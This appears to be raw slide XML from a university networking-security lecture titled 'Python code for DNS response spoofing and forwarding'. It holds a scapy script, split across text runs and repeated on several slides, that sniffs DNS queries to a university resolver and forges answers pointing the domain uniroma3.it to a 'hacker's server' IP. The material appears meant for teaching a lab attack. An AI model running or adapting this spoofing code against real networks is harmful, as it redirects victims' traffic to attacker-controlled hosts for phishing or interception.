            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{314D8907-7CB1-E5A5-3049-94257071B764}"/>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BCCC93F5-0944-3026-6F13-B9B8EE3D97DE}"/>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2028754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AEDD0-F020-31E6-E884-8DB192682626}"/>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F9C94480-C8F7-9719-676E-F3F2CBC92189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01AC0E49-88A2-9269-0C2E-FBC98AF69AAD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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en-US"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qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</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ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</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an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</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='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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spoofed_pkt</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ether_layer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ip_layer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udp_layer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dns_layer</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sendp</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spoofed_pkt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iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</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sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </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host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}",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prn</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dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except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KeyboardInterrupt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print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D10810-244D-0D88-BF75-22805EBC6B81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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19587BB1-04AD-583D-B0F7-08857289C838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB7D506-178A-F720-E0E2-82190CB9EF28}"/>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B6C071F1-41E6-2768-3C14-67A6EA150EA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2109631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68374-3140-3FD3-D72B-D5FE05EFA347}"/>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E1B67492-D65A-D9F3-AF4E-BD4AB339F3D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F414F52-6D0B-92F5-2A9E-A6AF517544C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </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sendp</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EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>DNS_UNI_IP = "110.0.0.10"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>INTERFACE = "eth0"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>TARGET_DOMAIN = "uniroma3.it"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>def</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dns_spoof</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pkt.haslayer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(DNSQR) and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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> == 0 and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 DNS_UNI_IP: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[DNSQR].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qname.decode</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t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> TARGET_DOMAIN in </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ether_layer</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ip_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = IP(</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udp_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = UDP(sport=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[UDP].</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport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dport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[UDP].sport)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dns_layer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = DNS(</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                id=</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[DNS].id,</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CB88938-9841-5D27-0F4B-D4C28B0DF23E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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B8DE1A29-3C24-5DD6-D3F0-E43E277B049A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1571624" y="116632"/>
            <a:ext cx="10010775" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{927FEA49-9AEF-0007-040A-2D1052587A6D}"/>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91D84ED6-1E9B-3194-87F1-F8EB3E8FDFC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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6641533-5B50-105B-EE22-EFBD746E8FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5794962" y="1400182"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105095"/>
              <a:gd name="adj2" fmla="val 7075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IP address of the hacker's server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DEAE85E-1FC6-6A34-30DB-8BE8DA76BA93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7617902" y="2189080"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -143423"/>
              <a:gd name="adj2" fmla="val 1357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IP address of the university's real DNS server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93C9BB4F-4A80-D4EE-167A-93338D13876E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7617902" y="3249387"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -168404"/>
              <a:gd name="adj2" fmla="val -9731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network card on which the script should work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{551CA55C-0723-386E-4420-9E6CFC1F89F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7617902" y="4309694"/>
            <a:ext cx="3470176" cy="685345"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -133498"/>
              <a:gd name="adj2" fmla="val -194351"/>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keyword we look for in DNS queries</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3045767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83565-1BA4-688E-45AB-A85FD1FC0E11}"/>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F816F2A5-E2DB-57FF-F4F6-C1397E0C3C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{067FB6AC-037F-D6E6-58CA-7CC8EEA31235}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>scapy.all</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> import DNSQR , DNS , IP , UDP , DNSRR , </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>send</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> ,sniff , </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sendp</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EVIL_IP = "210.0.3.50"</a:t>
              </a:r>
